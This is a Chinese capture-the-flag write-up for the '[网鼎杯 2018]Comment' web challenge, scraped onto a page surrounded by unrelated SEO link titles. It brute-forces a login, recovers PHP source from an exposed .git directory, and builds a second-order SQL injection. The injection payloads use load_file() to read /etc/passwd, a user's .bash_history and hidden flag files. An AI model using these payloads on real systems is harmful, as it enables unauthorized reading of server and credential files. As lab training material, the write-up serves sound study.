当前位置: 首页 > news >正文

网站代运营服务公司企业网站的功能列表

news 2025/12/27 0:57:09
网站代运营服务公司,企业网站的功能列表,淘宝有做钓鱼网站的吗,网站投资多少钱使用环境为https://adworld.xctf.org.cn/challenges#xff0c;搜索题目[网鼎杯 2018]Comment。 进入环境#xff0c;发现为一个留言板#xff0c;点击发帖试试。 尝试发帖 跳转到登录页面#xff0c;根据提示使用burp进行暴力破解。 发现payload为666时状态码不同。 尝试…使用环境为https://adworld.xctf.org.cn/challenges搜索题目[网鼎杯 2018]Comment。 进入环境发现为一个留言板点击发帖试试。 尝试发帖 跳转到登录页面根据提示使用burp进行暴力破解。 发现payload为666时状态码不同。 尝试密码为zhangwei666发现登录成功。 使用awvs进行扫描。发现存在.git目录并且存在git泄露漏洞。尝试使用githacker恢复源码。 刚恢复完是一段残缺的代码需要进行恢复到完整代码 git log --reflog git reset --hard 版本完整源码 ?php include mysql.php; session_start(); if($_SESSION[login] ! yes){header(Location: ./login.php);die(); } if(isset($_GET[do])){ switch ($_GET[do]) { case write:$category addslashes($_POST[category]);$title addslashes($_POST[title]);$content addslashes($_POST[content]);$sql insert into boardset category $category,title $title,content $content;$result mysql_query($sql);header(Location: ./index.php);break; case comment:$bo_id addslashes($_POST[bo_id]);$sql select category from board where id$bo_id;$result mysql_query($sql);$num mysql_num_rows($result);if($num0){$category mysql_fetch_array($result)[category];$content addslashes($_POST[content]);$sql insert into commentset category $category,content $content,bo_id $bo_id;$result mysql_query($sql);}header(Location: ./comment.php?id$bo_id);break; default:header(Location: ./index.php); } } else{header(Location: ./index.php); } ?分析代码可知当dowrite时传入的参数中的单引号均被过滤掉而当docomment时category被直接拿来用没有被过滤单引号那么二次注入点就在此。 构建payload 在dowrite时title和content随便写将category写成下面payload ,contentdatabase(),/*然后在docomment时将content写成 */#也就合成了一个查询函数 $sql insert into commentset category ,contentdatabase(),/*,content */#,bo_id $bo_id;查询flag是根据网上的资料查找的。 查看当前登录的用户 ,contentuser(),/*得知使用者是root权限 sql注入读取本地文件使用load_file() /etc/passwd这里存储用户信息 ,content(select load_file(/etc/passwd)),/*有一个www用户查看bash_history ,content(select load_file(/home/www/.bash_history)),/*发现有一操作rm -f .DS_Store删除了.DS_Store这个文件。而 .DS_Store 文件中经常会有一些不可见的字符可以使用hex函数对其进行16进制转换。 ,content(select hex(load_file(/tmp/html/.DS_Store))),/*全部复制并且进行ascii 十六进制解码。 发现有一段flag_8946e1ff1ee3e40f.php尝试查看这个文件 ,content(select load_file(/tmp/html/flag_8946e1ff1ee3e40f.php)),/*发现为空那就加上hex尝试 ,content(select hex(load_file(/tmp/html/flag_8946e1ff1ee3e40f.php))),/*解码 得到结果 ?php $flag flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}; ?但是提交答案发现是假的尝试其他目录 ,content(select hex(load_file(/var/www/html/flag_8946e1ff1ee3e40f.php))),/*解码 ?php$flagflag{0dd14aae81d94904b3492117e2a3d4df}; ?ee3e40f.php’))),/* [外链图片转存中...(img-EZ2sqSXR-1722830529065)]解码[外链图片转存中...(img-OSTJQXO8-1722830529065)] ?php $flagflag{0dd14aae81d94904b3492117e2a3d4df}; ? 得到正确的flag
http://www.w-s-a.com/news/650904/

相关文章:

  • 手机网站标准百度搜索关键词排名优化推广
  • 中国空间站科幻作文1000字wordpress运行库
  • 徐州做网站的wordpress可视化编辑器排行
  • 官方网站英语上海公司注册核名查询
  • 东莞网站建设推广云南昆明最新消息
  • 上网站乱码网页设计与网站建设案例教程
  • 宣讲网站建设wordpress多媒体主题
  • 如何成立网站互联网开发是做什么的
  • 网站首页的尺寸做多大网页图片排版
  • 龙岩天宫山索道多少钱河南网站排名优化哪家好
  • 北京做网站设计程序员和网站开发
  • 个人 做自媒体 建网站图片制作成视频的手机软件
  • h5 建站网站 移动端重庆潼南网站建设价格
  • 商企在线营销型网站怎么做时光网站
  • 网站建设方案论文1500竞价托管哪家便宜
  • 使用cdn的网站宣武网站建设
  • 营销型网站怎么建设企业网站Wap在线生成
  • 网站建设服务费应该做到什么科目广州网页制作服务商
  • 网站显示500错误怎么解决方法店面设计模板
  • 网站备案icp文化传媒有限公司
  • 北京企业建站模板微信公众号商城怎么制作
  • 制作网站 公司简介大型做网站的公司
  • 北京网站开发建设南昌网站小程序开发
  • 网站如何做ip签名图片宁波互联网
  • 中山小榄网站建设长沙网络营销品牌排名
  • 推广优化厂商联系方式网站推广教程优化整站
  • 为外国企业做中文网站建设网站建设单位哪家好
  • 生物制药公司网站模板有没有专业做steam创客的网站
  • 福田做棋牌网站建设找哪家效益快弄一个微信小程序多少钱
  • 成都哪家做网站建设比较好做推广赚钱的网站